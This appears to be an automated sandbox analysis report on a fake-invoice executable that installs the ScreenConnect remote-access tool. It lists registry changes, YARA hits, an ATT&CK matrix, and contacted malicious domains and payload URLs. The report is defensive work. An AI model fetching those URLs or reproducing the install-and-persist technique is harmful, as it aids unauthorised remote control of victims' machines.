Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.Windows.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.WindowsClient.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.Core.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.Client.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.Core.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.Windows.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.Core.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.Core.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.Windows.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.Client.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.Client.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.Core.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.Windows.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.dll VolumeInformation

Source: C:\Users\user\Desktop\E_BILL0041272508.exe

Code function: 0_2_009B1806 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_009B1806

Source: C:\Users\user\Desktop\E_BILL0041272508.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Deletes keys which are related to windows safe boot (disables safe mode boot)

Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe

Registry key or value deleted: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\ScreenConnect Client (b044e727-8609-4a6c-b885-92d6249fd38a)

Jump to behavior

Adds / modifies Windows certificates

Source: C:\Users\user\Desktop\E_BILL0041272508.exe

Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C Blob

Jump to behavior

Remote Access Functionality

Yara detected ScreenConnect Tool

Source: Yara match	File source: 6.0.ScreenConnect.WindowsClient.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000000.2369506289.00000000001E2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4002929791.0000023CE6080000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3991111838.0000023CCC49A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dfsvc.exe PID: 6456, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 6552, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ScreenConnect.ClientService.exe PID: 1340, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Valid Accounts	11 Native API	1 DLL Side-Loading	1 DLL Side-Loading	121 Disable or Modify Tools	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 Inhibit System Recovery
Credentials	Domains	Default Accounts	12 Command and Scripting Interpreter	1 DLL Search Order Hijacking	1 DLL Search Order Hijacking	1 Obfuscated Files or Information	LSASS Memory	2 File and Directory Discovery	Remote Desktop Protocol	Data from Removable Media	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	1 Valid Accounts	1 Valid Accounts	1 Install Root Certificate	Security Account Manager	34 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	2 Windows Service	1 Access Token Manipulation	1 Software Packing	NTDS	31 Security Software Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	1 Scheduled Task/Job	2 Windows Service	1 Timestomp	LSA Secrets	2 Process Discovery	SSH	Keylogging	13 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	1 Bootkit	12 Process Injection	1 DLL Side-Loading	Cached Domain Credentials	41 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	1 Scheduled Task/Job	1 DLL Search Order Hijacking	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Masquerading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Valid Accounts	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Modify Registry	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1 Access Token Manipulation	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	41 Virtualization/Sandbox Evasion	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking
Determine Physical Locations	Virtual Private Server	Compromise Hardware Supply Chain	Unix Shell	Systemd Timers	Systemd Timers	12 Process Injection	GUI Input Capture	Permission Groups Discovery	Replication Through Removable Media	Email Collection	Proxy	Exfiltration over USB	Network Denial of Service
Business Relationships	Server	Trusted Relationship	Visual Basic	Container Orchestration Job	Container Orchestration Job	1 Hidden Users	Web Portal Capture	Local Groups	Component Object Model and Distributed COM	Local Email Collection	Internal Proxy	Commonly Used Port	Direct Network Flood
Identify Business Tempo	Botnet	Hardware Additions	Python	Hypervisor	Process Injection	1 Bootkit	Credential API Hooking	Domain Groups	Exploitation of Remote Services	Remote Email Collection	External Proxy	Transfer Data to Cloud Account	Reflection Amplification

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
E_BILL0041272508.exe	18%	ReversingLabs
E_BILL0041272508.exe	14%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\ScreenConnect.Core.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\ScreenConnect.Windows.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\ScreenConnect.Client.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\ScreenConnect.ClientService.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.Client.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.ClientService.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.ClientService.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.Core.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.Windows.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.WindowsBackstageShell.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.WindowsClient.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.WindowsFileManager.exe	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
otohelp.top	3%	Virustotal		Browse
fp2e7a.wpc.phicdn.net	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://otohelp.top/Bin/ScreenConnect.Windows.dll	1%	Virustotal		Browse
https://otohelp.top/Bin/ScreenConnect.ClientService.dll	1%	Virustotal		Browse
https://otohelp.top/Bin/ScreenConnect.WindowsFileManager.exe.config	1%	Virustotal		Browse
https://otohelp.top/Bin/ScreenConnect.Client.dll	1%	Virustotal		Browse
https://otohelp.top/Bin/ScreenConnect.WindowsBackstageShell.exe	1%	Virustotal		Browse
https://otohelp.top	0%	Virustotal		Browse
http://www.xrml.org/schema/2001/11/xrml2coreS	0%	Virustotal		Browse
https://otohelp.top/Bin/ScreenConnect.Client.manifest	1%	Virustotal		Browse
http://www.w3.o	0%	Virustotal		Browse
https://otohelp.top/Bin/ScreenConnect.WindowsFileManager.exe	1%	Virustotal		Browse
http://www.xrml.org/schema/2001/11/xrml2core	0%	Virustotal		Browse
https://otohelp.top/Bin/ScreenConnect.Client.applicationX	1%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
mmf351.ddns.net	79.110.49.16	true	true		unknown
otohelp.top	79.110.49.16	true	true	3%, Virustotal, Browse	unknown
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://otohelp.top/Bin/ScreenConnect.WindowsFileManager.exe.config	true	1%, Virustotal, Browse	unknown
https://otohelp.top/Bin/ScreenConnect.Windows.dll	true	1%, Virustotal, Browse	unknown
https://otohelp.top/Bin/ScreenConnect.Client.dll	true	1%, Virustotal, Browse	unknown
https://otohelp.top/Bin/ScreenConnect.WindowsBackstageShell.exe	true	1%, Virustotal, Browse	unknown
https://otohelp.top/Bin/ScreenConnect.ClientService.dll	true	1%, Virustotal, Browse	unknown
https://otohelp.top/Bin/ScreenConnect.Client.manifest	true	1%, Virustotal, Browse	unknown
https://otohelp.top/Bin/ScreenConnect.WindowsFileManager.exe	true	1%, Virustotal, Browse	unknown
https://otohelp.top/Bin/ScreenConnect.WindowsClient.exe	true		unknown
https://otohelp.top/Bin/ScreenConnect.WindowsClient.exe.config	true		unknown
https://otohelp.top/Bin/ScreenConnect.Core.dll	true		unknown
https://otohelp.top/Bin/ScreenConnect.WindowsBackstageShell.exe.config	true		unknown
https://otohelp.top/Bin/ScreenConnect.ClientService.exe	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://otohelp.top/Bin/ScreenConnect.Client.application0	dfsvc.exe, 00000002.00000002.4002687215.0000023CE6050000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://otohelp.top/Bin/ScreenConnect.WindowsClient.exedl	dfsvc.exe, 00000002.00000002.4003870164.0000023CE61C0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://otohelp.top/Bin/ScreenConnect.WindowsClient.ex	dfsvc.exe, 00000002.00000002.3991111838.0000023CCC6FD000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://otohelp.top/Bin/ScreenConnect.Clie	dfsvc.exe, 00000002.00000002.3991111838.0000023CCC6FD000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://otohelp.top/Bin/ScreenConnect.WindowsBackstage	dfsvc.exe, 00000002.00000002.3991111838.0000023CCC6FD000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://otohelp.top/Bin/ScreenConnect.WindowsBackstageShell.exeU	dfsvc.exe, 00000002.00000002.4003870164.0000023CE61C0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.xrml.org/schema/2001/11/xrml2coreS	dfsvc.exe, 00000002.00000002.3991111838.0000023CCC1C0000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://otohelp.top/Bin/ScreenConnect.Windows.dllR	dfsvc.exe, 00000002.00000002.4004252606.0000023CE620F000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://otohelp.top/Bin/ScreenConnect.Wind	dfsvc.exe, 00000002.00000002.3991111838.0000023CCC789000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://www.w3.o	dfsvc.exe, 00000002.00000002.3991111838.0000023CCC554000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://otohelp.top	dfsvc.exe, 00000002.00000002.3991111838.0000023CCC6FD000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC893000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC14A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC789000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC64E000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	dfsvc.exe, 00000002.00000002.3991111838.0000023CCC14A000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000008.00000002.2443372592.00000000020BA000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://otohelp.top/Bin/ScreenConnect.x	dfsvc.exe, 00000002.00000002.3991111838.0000023CCC893000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://otohelp.top/Bin/ScreenConnect.WindowsFileManager.exe9	dfsvc.exe, 00000002.00000002.4003870164.0000023CE61C0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://otohelp.top/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient.application	ScreenConnect.WindowsClient.exe, 00000006.00000002.2385257906.00000000023A1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.2386097468.000000001AE66000.00000004.00000020.00020000.00000000.sdmp, AYPVIQNL.log.2.dr	false		unknown
https://otohelp.top/Bin/ScreenConnect.Client.application?e=	E_BILL0041272508.exe, 00000000.00000003.2526903886.000000000147B000.00000004.00000020.00020000.00000000.sdmp, E_BILL0041272508.exe, 00000000.00000002.2527278235.000000000147B000.00000004.00000020.00020000.00000000.sdmp	false		unknown
